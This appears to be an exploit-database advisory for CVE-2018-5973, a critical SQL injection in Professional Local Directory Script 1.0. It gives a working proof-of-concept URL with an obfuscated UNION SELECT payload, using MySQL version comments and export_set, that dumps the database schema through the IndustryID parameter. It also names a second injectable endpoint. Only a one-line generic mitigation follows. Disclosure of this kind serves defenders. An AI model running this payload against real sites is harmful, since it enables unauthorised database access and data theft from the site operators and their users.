vendor:
Professional Local Directory Script
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Professional Local Directory Script
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: N/A
Related CWE: CVE-2018-5973
CPE: a:eihitech:professional_local_directory_script:1.0
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018
Professional Local Directory Script 1.0 – SQL Injection
The vulnerability allows an attacker to inject sql commands. Proof of Concept: 1) http://localhost/[PATH]/sellers_subcategories.php?IndustryID=[SQL] -105++/*!08888uNiOn*/(/*!08888SelECt*/+0x3078323833313239,0x283229,0x283329,0x283429,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283629,0x283729)--+- 2) http://localhost/[PATH]/suppliers.php?IndustryID=[SQL]&CategoryID=[SQL]
Mitigation:
Input validation and sanitization should be done to prevent SQL injection attacks.